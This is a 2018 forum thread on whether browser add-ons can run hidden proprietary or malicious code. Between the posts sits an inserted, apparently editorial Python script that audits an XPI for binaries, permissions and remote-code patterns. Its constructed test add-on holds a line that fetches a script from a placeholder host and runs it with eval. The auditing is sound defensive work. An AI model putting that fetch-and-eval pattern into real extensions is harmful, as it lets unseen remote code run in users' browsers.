Re: How is it possible for add-ons to be proprietary

Posted: Sun Apr 01, 2018 8:27 pm
by GµårÐïåñ
rehash wrote:
> So in conclusion the only way to be sure that by using an add-on you're running only free open software is to check:
>   • its license
>   • that all files in its XPI are source files and not binary files
>   • every last line of its source code, because in one line it can fetch proprietary unknown code and execute it
> This is a security and privacy nightmare. Is there any control over add-ons that are offered on addons.mozilla.org and over what they really do? Who checks this and how - for each new version? How can a user know which add-ons are trustworthy?
Pretty much, security is a proactive endeavor, not a passive one. You can either trust that they are legit or do your due diligence; unfortunately there is not much in between. Theoretically WebExtensions alleviate this, as they are for all intents and purposes limited to being pure scripted, which should imply that you can't do that anymore, but you can theoretically still import external scripts, so there is that. There are, I am sure, script analyzers you can dump the code into and get a breakdown of what's in there to expedite analysis a bit, but again that's a matter of dealer's choice (meaning what works for you to feel comfortable with something); no one can really tell you how to approach your own peace of mind.
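The three checks in rehash's list (license, no binaries in the XPI, no line that pulls in and runs remote code) can be mechanised as a first pass before the manual read-through GµårÐïåñ describes. The script below is an added example, not code from this thread or from Mozilla; it builds a small constructed XPI in memory (the file names, the `example.invalid` host and the permissions are made up for the demonstration), then reports binary files, files whose extension is not a reviewable source type, the manifest's requested permissions, and any line that fetches over the network, loads an external script or evaluates a string as code. Each hit is a place to look, not a verdict; a clean report still leaves the reading to you.

```python
import io
import json
import re
import zipfile

# Extensions treated as reviewable source/text. Anything else that is not
# an image gets listed so a reviewer looks at it by hand.
SOURCE_EXTENSIONS = {
    ".js", ".jsm", ".json", ".html", ".htm", ".xhtml", ".xul", ".css",
    ".txt", ".md", ".svg", ".xml", ".dtd", ".properties", ".manifest",
}
# Images are binary but carry no code; they are skipped rather than flagged.
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".ico"}

# Each pattern marks a line that loads code from outside the package or
# turns a string into code. Labels are free text chosen for this example.
REMOTE_CODE_PATTERNS = [
    ("external script load", re.compile(r"\bimportScripts\s*\(|\bloadSubScript\s*\(")),
    ("script tag with remote src", re.compile(r"<script[^>]+src\s*=\s*[\"']https?://", re.I)),
    ("string evaluation", re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")),
    ("network fetch", re.compile(r"\bfetch\s*\(\s*[\"']https?://|\bXMLHttpRequest\b")),
]


def looks_binary(data):
    """Heuristic: a NUL byte or a low share of printable bytes means binary."""
    if b"\x00" in data:
        return True
    sample = data[:4096]
    if not sample:
        return False
    printable = sum(1 for b in sample if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(sample) < 0.85


def ext_of(name):
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def audit_xpi(xpi_bytes):
    """Inspect an XPI (a zip) and return a dict of findings for manual review."""
    report = {
        "binary_files": [],      # files that are not plain text at all
        "non_source_files": [],  # text files with an extension we do not expect
        "permissions": [],       # from manifest.json, if present and parseable
        "remote_code_hits": [],  # (file, line number, label, line excerpt)
    }
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            name = info.filename
            data = z.read(name)
            ext = ext_of(name)
            if ext in IMAGE_EXTENSIONS:
                continue
            if looks_binary(data):
                report["binary_files"].append(name)
                continue
            if ext not in SOURCE_EXTENSIONS:
                report["non_source_files"].append(name)
            text = data.decode("utf-8", errors="replace")
            if name == "manifest.json":
                try:
                    report["permissions"] = list(json.loads(text).get("permissions", []))
                except ValueError:
                    pass
            for lineno, line in enumerate(text.splitlines(), 1):
                for label, pattern in REMOTE_CODE_PATTERNS:
                    if pattern.search(line):
                        report["remote_code_hits"].append((name, lineno, label, line.strip()[:80]))
    return report


def build_sample_xpi():
    """Constructed sample XPI for the demonstration; not a real add-on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps({
            "manifest_version": 2, "name": "sample", "version": "0.1",
            "permissions": ["<all_urls>", "tabs"],
        }))
        z.writestr("background.js",
                   "// constructed sample: pulls code from a remote host and runs it\n"
                   "fetch(\"https://example.invalid/update.js\")\n"
                   "  .then(r => r.text())\n"
                   "  .then(code => eval(code));\n")
        z.writestr("content.js", "document.title = document.title.toUpperCase();\n")
        z.writestr("icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        z.writestr("helper.dll", b"MZ\x90\x00" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    result = audit_xpi(build_sample_xpi())
    print("binary files:", result["binary_files"])
    print("permissions:", result["permissions"])
    for hit in result["remote_code_hits"]:
        print("%s:%d [%s] %s" % hit)
```

Run it against a real XPI by replacing `build_sample_xpi()` with the file's bytes; the binary-file list answers rehash's second bullet directly, and every remote-code hit points at a line to read before deciding whether the add-on is one you trust.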

Re: How is it possible for add-ons to be proprietary

Posted: Fri Apr 06, 2018 2:32 pm
by rehash
Have there been lots of known cases of malicious add-ons in the past? Giorgio wrote that a pre-WebExtensions add-on could easily send your disk contents to a remote server https://hackademix.net/2017/12/11/noscr ... ermission/. Would the add-on community even be likely to discover something like that if the add-on was clever and stealthy?

Re: How is it possible for add-ons to be proprietary

Posted: Fri Apr 06, 2018 5:53 pm
by GµårÐïåñ
If there is sufficient community involvement and code review around it, then yes.